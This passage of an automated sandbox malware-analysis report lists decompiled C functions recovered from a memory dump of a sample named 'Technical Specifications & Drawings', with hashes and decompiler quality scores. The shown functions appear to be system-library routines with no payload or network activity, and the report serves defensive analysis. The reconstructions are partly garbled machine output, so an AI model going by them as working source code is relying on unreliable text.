                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                  • Instruction ID: f6acb8c876693d60d9023400f60d4c0d1f640f7ee5052dbc99c85eb257e96013
                                                  • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                  • Instruction Fuzzy Hash: AF01D1322446849BD323976DC808F69BB99EF91754F0800A6FA14CB6F2DA78D980C615
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0183FE87 Relevance: .0, Instructions: 38COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E0183FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x189d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E017C7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                  0x0183fe96
                                                  0x0183fe9e
                                                  0x0183fea1
                                                  0x0183fead
                                                  0x0183feb3
                                                  0x0183feb9
                                                  0x0183fec3
                                                  0x0183fed5
                                                  0x0183fec5
                                                  0x0183fece
                                                  0x0183fece
                                                  0x0183fee0
                                                  0x0183fee1
                                                  0x0183fee3
                                                  0x0183fee8
                                                  0x0183fefb

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a5b101352b3eb44be6a349369531d4ef542c66fc63579d2908ea112f63934b41
                                                  • Instruction ID: d7f59865fd611b81b23f70de824edd73d6a7374abc9af05eceee7a70383e48ed
                                                  • Opcode Fuzzy Hash: a5b101352b3eb44be6a349369531d4ef542c66fc63579d2908ea112f63934b41
                                                  • Instruction Fuzzy Hash: D6016271A0020DAFCB14DFA8D546A6EBBF4FF08704F544159B515DB382DA35DA01CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0186131B Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 48%
                                                  			E0186131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x189d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E017C7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                  0x0186131b
                                                  0x0186132a
                                                  0x01861330
                                                  0x01861336
                                                  0x0186133e
                                                  0x01861341
                                                  0x01861344
                                                  0x0186134f
                                                  0x01861361
                                                  0x01861351
                                                  0x0186135a
                                                  0x0186135a
                                                  0x0186136c
                                                  0x0186136d
                                                  0x0186136f
                                                  0x01861374
                                                  0x01861387

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: adc9d2cc09825fe5a68e0bd699c301f6a2c88b9c1d21695e10fd244414c10780
                                                  • Instruction ID: 443bae43e577fe47f553493962528de8926a40a6f372296740b681d706ad009c
                                                  • Opcode Fuzzy Hash: adc9d2cc09825fe5a68e0bd699c301f6a2c88b9c1d21695e10fd244414c10780
                                                  • Instruction Fuzzy Hash: 04011D71A01249AFCB04DFA9D549AAEB7F4FF58700F404059F905EB341E6349A40CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01878F6A Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 48%
                                                  			E01878F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x189d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E017C7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                  0x01878f6a
                                                  0x01878f79
                                                  0x01878f81
                                                  0x01878f84
                                                  0x01878f8b
                                                  0x01878f91
                                                  0x01878f94
                                                  0x01878f9e
                                                  0x01878fb0
                                                  0x01878fa0
                                                  0x01878fa9
                                                  0x01878fa9
                                                  0x01878fbb
                                                  0x01878fbc
                                                  0x01878fbe
                                                  0x01878fc3
                                                  0x01878fd6

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a6cf627c5db54dedac08bd34e6ed70161cdde4652852408c7848c6c974659ef
                                                  • Instruction ID: a691b3f3502579e62853524ffbfa1f414647781e823aadf9ec699b004a222abc
                                                  • Opcode Fuzzy Hash: 8a6cf627c5db54dedac08bd34e6ed70161cdde4652852408c7848c6c974659ef
                                                  • Instruction Fuzzy Hash: EA013C75A0020DAFDB04EFB8D549AAEBBF4EF18304F504059B905EB384EA34DA00CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01861608 Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 46%
                                                  			E01861608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x189d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E017C7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                  0x01861608
                                                  0x01861617
                                                  0x0186161d
                                                  0x01861625
                                                  0x01861628
                                                  0x0186162b
                                                  0x01861636
                                                  0x01861648
                                                  0x01861638
                                                  0x01861641
                                                  0x01861641
                                                  0x01861653
                                                  0x01861654
                                                  0x01861656
                                                  0x0186165b
                                                  0x0186166e

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 70c489d27a755251b843d202edbf3fc0aa32baceb445de1351739e16e002643f
                                                  • Instruction ID: 9267e3253965286ca37fcfb9648c67e4c32494e3fa9e6a280ba0396e96f7bf8a
                                                  • Opcode Fuzzy Hash: 70c489d27a755251b843d202edbf3fc0aa32baceb445de1351739e16e002643f
                                                  • Instruction Fuzzy Hash: 88F06271A00249EFDB14DFA8D549A6EBBF8EF58300F444059B905EB391EA349A00CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017CC577 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017CC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E017CC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x17811cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E018788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                  0x017cc577
                                                  0x017cc57d
                                                  0x017cc581
                                                  0x017cc5b5
                                                  0x017cc5b9
                                                  0x017cc5ce
                                                  0x017cc5ce
                                                  0x017cc5ca
                                                  0x00000000
                                                  0x017cc5ca
                                                  0x017cc5c4
                                                  0x017cc5c8
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x017cc5ad
                                                  0x00000000
                                                  0x017cc5af

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed0a8b02744ec30142e505d66b35c5f90cd4446f9c7a58f8f07c0f1dcd715531
                                                  • Instruction ID: 781b731198e7cccfc51f6e6c5a78864ba0fcc37eaa286ae0f90aca9e1e7d79b4
                                                  • Opcode Fuzzy Hash: ed0a8b02744ec30142e505d66b35c5f90cd4446f9c7a58f8f07c0f1dcd715531
                                                  • Instruction Fuzzy Hash: 3DF0B4B29156909FE737D71CE014B21FFD49B29F70F7444AFD91D87106C6A4D880C251
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01862073 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 94%
                                                  			E01862073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0185FD22(__ecx);
				_t19 =  *0x189849c - _t3; // 0x78df40c7
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1898748; // 0x0
					if(__eflags <= 0) {
						E01861C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1898724 & 0x00000004;
							if(( *0x1898724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1898724; // 0x0
					return E01858DF1(__ebx, 0xc0000374, 0x1895890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                  0x01862076
                                                  0x01862078
                                                  0x0186207d
                                                  0x01862083
                                                  0x018620a4
                                                  0x018620aa
                                                  0x018620ac
                                                  0x018620b7
                                                  0x018620ba
                                                  0x018620bc
                                                  0x018620c9
                                                  0x018620c9
                                                  0x018620d0
                                                  0x018620d2
                                                  0x00000000
                                                  0x018620d2
                                                  0x018620be
                                                  0x018620c3
                                                  0x018620c5
                                                  0x018620c7
                                                  0x00000000
                                                  0x00000000
                                                  0x018620c7
                                                  0x018620bc
                                                  0x018620d4
                                                  0x01862085
                                                  0x01862085
                                                  0x018620a3
                                                  0x018620a3

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc2e143fd13a594d8a190f9d5f3a09cc1c00a620cb79d77723d08e85c1761246
                                                  • Instruction ID: 6fccfe406bfc858ba61c7e1076ec8231af5ff75e9f0c16fe986d124159fabffb
                                                  • Opcode Fuzzy Hash: bc2e143fd13a594d8a190f9d5f3a09cc1c00a620cb79d77723d08e85c1761246
                                                  • Instruction Fuzzy Hash: C8F0A72641518A5ADF336B2C61113D53BDBD75B350F0D04C6D950D720AC9358B93CF12
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017E927A Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 54%
                                                  			E017E927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L017C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E017EFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E017E92C6(_t11, _t14);
				}
				return _t11;
			}





                                                  0x017e9295
                                                  0x017e9299
                                                  0x017e929f
                                                  0x017e92aa
                                                  0x017e92ad
                                                  0x017e92ae
                                                  0x017e92af
                                                  0x017e92b0
                                                  0x017e92b4
                                                  0x017e92bb
                                                  0x017e92bb
                                                  0x017e92c5

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                  • Instruction ID: 1aa2ae8994bb359ab22532b4c6f034499ed2f84ca300604b7c5b21783ce077a7
                                                  • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                  • Instruction Fuzzy Hash: 27E02B323405016BEB219E09CC88F03B7EDDFD6724F00407CF6001E246C6E5DD0887A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01878D34 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 43%
                                                  			E01878D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x189d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E017C7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                  0x01878d34
                                                  0x01878d43
                                                  0x01878d4b
                                                  0x01878d4e
                                                  0x01878d52
                                                  0x01878d5c
                                                  0x01878d6e
                                                  0x01878d5e
                                                  0x01878d67
                                                  0x01878d67
                                                  0x01878d79
                                                  0x01878d7a
                                                  0x01878d7c
                                                  0x01878d81
                                                  0x01878d94

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4aecee9f3ec88539aa9bedf762945e655a36cc2d23f458b6a1fb51dccec5288
                                                  • Instruction ID: 9ae15d682768a8d87120d528c6d6d906064626aee777916731d029a597eb00be
                                                  • Opcode Fuzzy Hash: e4aecee9f3ec88539aa9bedf762945e655a36cc2d23f458b6a1fb51dccec5288
                                                  • Instruction Fuzzy Hash: 85F05471A0460DAFDB14EFB8D549A6EBBF4EF18700F548099F905EB295EA34DA00CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01878B58 Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 36%
                                                  			E01878B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x189d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E017C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                  0x01878b67
                                                  0x01878b6f
                                                  0x01878b72
                                                  0x01878b7d
                                                  0x01878b8f
                                                  0x01878b7f
                                                  0x01878b88
                                                  0x01878b88
                                                  0x01878b9a
                                                  0x01878b9b
                                                  0x01878b9d
                                                  0x01878ba2
                                                  0x01878bb5

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c426d74bc047bf18972d1d2154d137727e7de83459e501cb83ce705601a89bc6
                                                  • Instruction ID: 119ee70d8298c6cfd4b2a3c696599eabd5b3bb7533f3bada603bb22db66912ee
                                                  • Opcode Fuzzy Hash: c426d74bc047bf18972d1d2154d137727e7de83459e501cb83ce705601a89bc6
                                                  • Instruction Fuzzy Hash: 9EF089B1A04259ABDB14EBA8D50AE7EB7F4EF14704F440459BA05DB384EA34DA00C794
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017C746D Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E017C746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E017BEB70(__ecx, 0x18979a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E017E95D0();
							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                  0x017c746d
                                                  0x017c746d
                                                  0x017c746d
                                                  0x017c7471
                                                  0x017c7488
                                                  0x0180f92d
                                                  0x017c748e
                                                  0x017c7491
                                                  0x017c7495
                                                  0x0180f937
                                                  0x0180f93a
                                                  0x0180f94e
                                                  0x0180f953
                                                  0x0180f956
                                                  0x0180f956
                                                  0x017c7495
                                                  0x00000000
                                                  0x017c7488
                                                  0x017c7473
                                                  0x017c7478
                                                  0x017c747d
                                                  0x017c7481
                                                  0x00000000
                                                  0x017c7481
                                                  0x017c747d
                                                  0x017c747a
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0339ac27a35c645b27b169ec5431e284d59a53ca2549518f457a64ddbc751b48
                                                  • Instruction ID: 5f1ec3af0c23f6805d8b98c4ec59f1e5281f2c3c931ad84e5c820b8f88746ae9
                                                  • Opcode Fuzzy Hash: 0339ac27a35c645b27b169ec5431e284d59a53ca2549518f457a64ddbc751b48
                                                  • Instruction Fuzzy Hash: DFF0B434500149AADF5A976CC840B7AFFA2AF04B14F04415DD551EF191EF249A00CF85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 01878CD6 Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 36%
                                                  			E01878CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x189d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E017C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E017EB640(E017E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                  0x01878ce5
                                                  0x01878ced
                                                  0x01878cf0
                                                  0x01878cfb
                                                  0x01878d0d
                                                  0x01878cfd
                                                  0x01878d06
                                                  0x01878d06
                                                  0x01878d18
                                                  0x01878d19
                                                  0x01878d1b
                                                  0x01878d20
                                                  0x01878d33

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1780000_Technical Specifications & Drawings.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d4bdd9cee8956361473cbbb409bb002599672b200290db46b5b9eb221eece91e
                                                  • Instruction ID: e1c023c225d085a8c7b9485dbf936cddb1bedcb5e6a0df07761eb909ed26a051
                                                  • Opcode Fuzzy Hash: d4bdd9cee8956361473cbbb409bb002599672b200290db46b5b9eb221eece91e
                                                  • Instruction Fuzzy Hash: 12F08271A04609ABDB04DBA8D94EE6EBBF4EF19304F540199F916EB284EA34DA00CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 017A4F2E Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E017A4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E018788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E017CC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1781030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                  0x017a4f2e
                                                  0x017a4f34
                                                  0x017a4f38
                                                  0x01800b85
                                                  0x01800b85
                                                  0x01800b89
                                                  0x01800b9a
                                                  0x01800b9a
                                                  0x01800b9f
                                                  0x00000000
                                                  0x01800b9f
                                                  0x01800b94
                                                  0x01800b98
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x01800b98
                                                  0x017a4f3e
                                                  0x017a4f48
                                                  0x00000000
                                                  0x017a4f6e
                                                  0x00000000
                                                  0x017a4f70

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: true
                                                  • Associated: 00000004.00000002.348742770.000000000189B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000004.00000002.348772341.000000000189F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
